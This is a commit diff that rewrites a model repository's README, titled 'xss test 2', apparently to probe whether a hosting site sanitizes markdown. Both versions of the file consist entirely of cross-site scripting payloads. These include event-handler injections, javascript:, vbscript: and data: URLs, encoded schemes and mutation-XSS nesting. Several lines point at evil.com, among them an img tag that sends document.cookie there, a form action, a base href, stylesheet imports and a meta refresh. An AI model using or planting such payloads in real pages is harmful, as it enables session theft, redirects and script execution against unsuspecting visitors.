asdasdasadsdas commited on
Commit
5385b77
·
verified ·
1 Parent(s): 55fa762

xss test 2

Browse files
Files changed (1) hide show
  1. README.md +32 -10
README.md CHANGED
@@ -2,20 +2,42 @@
2
  license: mit
3
  ---
4
 
5
- # Test Model
6
 
7
- <img src=x onerror=alert(document.domain)>
8
 
9
- <svg onload=alert(1)>
10
 
11
- [click me](javascript:alert(1))
12
 
13
- <iframe src="javascript:alert(1)">
14
 
15
- <details open ontoggle=alert(1)>
16
- <summary>test</summary>
17
- </details>
18
 
19
- <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src=x onerror=alert(1)>">
20
 
21
- <a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)">click</a>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
2
  license: mit
3
  ---
4
 
5
+ <a href="data:text/html,<script>alert(1)</script>">data url</a>
6
 
7
+ <a href="vbscript:alert(1)">vbscript</a>
8
 
9
+ <form action="https://evil.com"><button>submit</button></form>
10
 
11
+ <base href="https://evil.com">
12
 
13
+ <link rel="stylesheet" href="https://evil.com/steal.css">
14
 
15
+ <style>@import url('https://evil.com/steal.css');</style>
 
 
16
 
17
+ <meta http-equiv="refresh" content="0;url=https://evil.com">
18
 
19
+ <object data="https://evil.com/evil.swf"></object>
20
+
21
+ <embed src="https://evil.com/evil.swf">
22
+
23
+ <video><source onerror="alert(1)"></video>
24
+
25
+ <body onload="alert(1)">
26
+
27
+ <marquee onstart=alert(1)>xss</marquee>
28
+
29
+ <input onfocus=alert(1) autofocus>
30
+
31
+ <select autofocus onfocus=alert(1)>
32
+
33
+ <keygen autofocus onfocus=alert(1)>
34
+
35
+ <video autoplay onloadstart=alert(1)><source src="x"></video>
36
+
37
+ <audio autoplay onloadstart=alert(1)><source src="x"></audio>
38
+
39
+ <img src="https://evil.com/log?cookie="+document.cookie>
40
+
41
+ <svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x"/></svg>
42
+
43
+ <math><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></math>